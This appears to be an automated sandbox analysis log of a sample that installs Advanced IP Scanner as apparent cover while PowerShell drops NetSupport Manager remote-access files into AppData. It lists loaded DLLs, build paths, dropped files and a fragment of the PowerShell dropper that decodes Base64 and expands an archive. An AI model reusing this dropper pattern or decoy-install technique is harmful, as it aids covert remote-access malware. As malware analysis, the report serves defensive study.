                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Advanced IP Scanner for Windows.lnk.1.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\SystemUtil\nsm_vpro.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpWindow found: window name: TSelectLanguageFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: KC0uZWwr8p.exeStatic file information: File size 21424072 > 1048576
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dllJump to behavior
                                  Source: KC0uZWwr8p.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4097717699.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2035313904.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2122570956.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-5C3J6.tmp.1.dr
                                  Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdba source: is-BPHN2.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-Q62S4.tmp.1.dr
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-RT7U6.tmp.1.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-MR0EO.tmp.1.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2035069652.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2120902471.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, msvcr100.dll.3.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Widgets.pdb source: is-MH1O8.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1945716217.0000000007043000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: is-FLT6F.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr
                                  Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdb source: is-BPHN2.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-Q62S4.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4097611987.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2035242629.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2122115780.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.3.dr
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: is-AQQBN.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: is-5KHP2.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-L4L9S.tmp.1.dr

                                  Data Obfuscation

                                  barindex
                                  Found suspicious powershell code related to unpacking or dynamic code loading
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($encodedData);[System.IO.File]::WriteAllBytes($archiveFile, $decodedBytes);New-Item -ItemType Directory -Path $installPath;Expand-Archive -Path $archiveFile -DestinationPath $installP
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: KC0uZWwr8p.exeStatic PE information: section name: .didata
                                  Source: KC0uZWwr8p.tmp.0.drStatic PE information: section name: .didata
                                  Source: is-LEVQP.tmp.1.drStatic PE information: section name: .didata
                                  Source: is-OESQ5.tmp.1.drStatic PE information: section name: .didat
                                  Source: is-DORH9.tmp.1.drStatic PE information: section name: .00cfg
                                  Source: is-1PGBC.tmp.1.drStatic PE information: section name: .qtmetad
                                  Source: is-F8M60.tmp.1.drStatic PE information: section name: .qtmetad
                                  Source: PCICL32.DLL.3.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07279CE5 push FFFFFFE8h; ret 3_2_07279CE9
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07FD0C50 push eax; ret 3_2_07FD0C63
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1116B825 push ecx; ret 7_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11166719 push ecx; ret 7_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11040641 push 3BFFFFFEh; ret 7_2_11040646
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C6BBF push ecx; ret 7_2_685C6BD2
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C4DF5 push 685C43F9h; retf 7_2_685C4E1F
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B8377 push 3BFFFFFFh; retf 7_2_685B837C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685BE36C push edi; ret 7_2_685BE37B
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685BE3F7 push edi; ret 7_2_685BE3F9
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B94C5 push ecx; ret 7_2_685B94D8
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_687E0995 push ecx; ret 7_2_687E09A8
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1116B825 push ecx; ret 8_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11166719 push ecx; ret 8_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11040641 push 3BFFFFFEh; ret 8_2_11040646
                                  Source: msvcr100.dll.3.drStatic PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MH1O8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-LEVQP.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-OESQ5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QDVS6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-U7801.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-V3C3T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-PELB8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-Q62S4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-NB2QQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)Jump to dropped file
